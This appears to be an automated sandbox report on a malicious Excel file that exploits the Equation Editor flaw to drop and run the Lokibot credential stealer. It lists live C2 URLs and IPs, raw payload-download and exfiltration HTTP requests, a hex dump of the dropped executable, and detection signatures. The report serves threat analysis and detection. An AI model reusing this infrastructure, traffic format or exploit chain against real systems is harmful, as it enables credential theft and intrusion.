
Windows Analysis Report Shipping-Documents.xlsx

Overview

General Information

Sample Name: Shipping-Documents.xlsx
Analysis ID: 435330
MD5: 20e540ed9d02f60f7fb928ed8fe60f1f
SHA1: afa6c289fbeed004fe3a52c666cf32a8ae444e79
SHA256: 3c48a312d69b2d72bec8b3dad17e99ee1241afff875e97b73569509d5f8b07ec
Tags: VelvetSweatshop, xlsx

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2520 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2724 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2856 cmdline: 'C:\Users\Public\vbc.exe' MD5: 7146B0D2CAED6422C289A08F63A5C685)
      • vbc.exe (PID: 3052 cmdline: C:\Users\Public\vbc.exe MD5: 7146B0D2CAED6422C289A08F63A5C685)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/S4wFP8QBww9Tp"]}

Yara Overview

Memory Dumps

Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_Lokibot | Description: Yara detected Lokibot | Author: Joe Security
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp | Rule: Loki_1 | Description: Loki Payload | Author: kevoreilly
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp | Rule: Lokibot | Description: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Unpacked PEs

Source: 5.2.vbc.exe.400000.0.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 5.2.vbc.exe.400000.0.unpack | Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
Source: 5.2.vbc.exe.400000.0.unpack | Rule: JoeSecurity_Lokibot | Description: Yara detected Lokibot | Author: Joe Security
Source: 5.2.vbc.exe.400000.0.unpack | Rule: Loki_1 | Description: Loki Payload | Author: kevoreilly
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version
Source: 5.2.vbc.exe.400000.0.unpack | Rule: Lokibot | Description: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
  • 0x12fff:$des3: 68 03 66 00 00
  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.89.90.94, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2724, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2724, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2724, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2856
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2724, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2856

Signature Overview

AV Detection:

Found malware configuration
Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/S4wFP8QBww9Tp"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe | ReversingLabs: Detection: 10%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 10%
Multi AV Scanner detection for submitted file
Source: Shipping-Documents.xlsx | Virustotal: Detection: 40%
Source: Shipping-Documents.xlsx | ReversingLabs: Detection: 31%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: StringBuilderCache.pdb source: vbc.exe, vbc.exe.2.dr
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Source: excel.exe | Memory has grown: Private usage: 4MB later: 64MB
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 103.89.90.94:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 103.89.90.94:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 63.141.228.141:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 63.141.228.141:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor | URLs: http://63.141.228.141/32.php/S4wFP8QBww9Tp
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Wed, 16 Jun 2021 10:29:38 GMT
  Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
  Last-Modified: Wed, 16 Jun 2021 00:49:42 GMT
  ETag: "ba000-5c4d77753dec3"
  Accept-Ranges: bytes
  Content-Length: 761856
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 4a c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 94 0b 00 00 0a 00 00 00 00 00 00 de b2 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 b2 0b 00 4b 00 00 00 00 c0 0b 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 0c 00 00 00 3f b2 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 92 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 06 00 00 00 c0 0b 00 00 08 00 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0b 00 00 02 00 00 00 9e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b2 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 26 01 00 68 05 01 00 03 00 00 00 01 00 00 06 50 2c 02 00 ef 85 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 13 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 bb 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 03 00 00 00 16 39 53 00 00 00 26 02 16 28 11 00 00 0a 38 0b 00 00 00 26 20 01 00 00 00 38 3b 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 38 2a 00 00 00 02 16 28 07 00 00 06 20 06 00 00 00 38 19 00 00 00 02 16 28 09 00 00 06 38 bb ff ff ff 20 03 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 c2 ff ff ff a0 ff ff ff c2 ff ff ff b1 ff ff ff 90 ff ff ff 89 ff ff ff 10 00 00 00 2f 00 00 00 20 05 00 00 00 28 05 00 00 06 3a cc ff ff ff 26 02 16 28 08 00 00 06 16 28 05 00 00 06 39 73 ff ff ff 26 20 00 00 00 00 16 39 ad ff ff ff 26 2a 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 0d 00 00 06 2a 00 00 56 2b 02 26 16 02 28 0b 00 00 06 6f 23 00 00 06 28 0e 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 4a 2b 02 2
Source: Joe Sandbox View | IP Address: 63.141.228.141 63.141.228.141
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View | ASN Name: NOCIXUS NOCIXUS
Source: global traffic | HTTP traffic detected:
  GET /pzldoc/regasm.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 103.89.90.94
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST /32.php/S4wFP8QBww9Tp HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 63.141.228.141
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: B78A3212
  Content-Length: 176
  Connection: close
Source: global traffic | HTTP traffic detected:
  POST /32.php/S4wFP8QBww9Tp HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 63.141.228.141
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: B78A3212
  Content-Length: 176
  Connection: close
Source: global traffic | HTTP traffic detected:
  POST /32.php/S4wFP8QBww9Tp HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 63.141.228.141
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: B78A3212
  Content-Length: 149
  Connection: close
Source: global traffic | HTTP traffic detected:
  POST /32.php/S4wFP8QBww9Tp HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 63.141.228.141
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: B78A3212
  Content-Length: 149
  Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 103.89.90.94 (50 identical entries in the original report)
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00404ED4 recv,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6AB76E0.emf
Source: global traffic | HTTP traffic detected:
  GET /pzldoc/regasm.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 103.89.90.94
  Connection: Keep-Alive
Source: unknown | HTTP traffic detected:
  POST /32.php/S4wFP8QBww9Tp HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 63.141.228.141
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: B78A3212
  Content-Length: 176
  Connection: close
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 16 Jun 2021 10:29:47 GMT
  Server: Apache
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
Source: vbc.exe, 00000005.00000002.2182254082.00000000008D4000.00000004.00000020.sdmp | String found in binary or memory: http://63.141.228.141/32.php/S4wFP8QBww9Tp
Source: vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2170728064.0000000002361000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: A6AB76E0.emf.0.dr | String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, vbc.exe, 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: vbc.exe | String found in binary or memory: https://github.com/georgw777/
Source: vbc.exe | String found in binary or memory: https://github.com/georgw777/MediaManager
Source: vbc.exe, 00000004.00000000.2161017267.0000000000D02000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2168355610.0000000000D02000.00000020.00020000.sdmp, vbc.exe.2.dr | String found in binary or memory: https://github.com/georgw777/MediaManager;https://github.com/georgw777/
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exeJump to dropped file
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E90E1
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EC3D0
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EBB78
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EDDA8
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002ECE76
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E555A
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EF8D8
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EBA83
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EBAD0
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EED48
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E2D80
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E4F60
Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EAFB2
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00615819
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00610048
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00615CE0
Source: C:\Users\Public\vbc.exe | Code function: 4_2_006148C4
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00616080
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00610548
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00610538
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00610270
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00616650
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00613658
Source: C:\Users\Public\vbc.exe | Code function: 4_2_006112A8
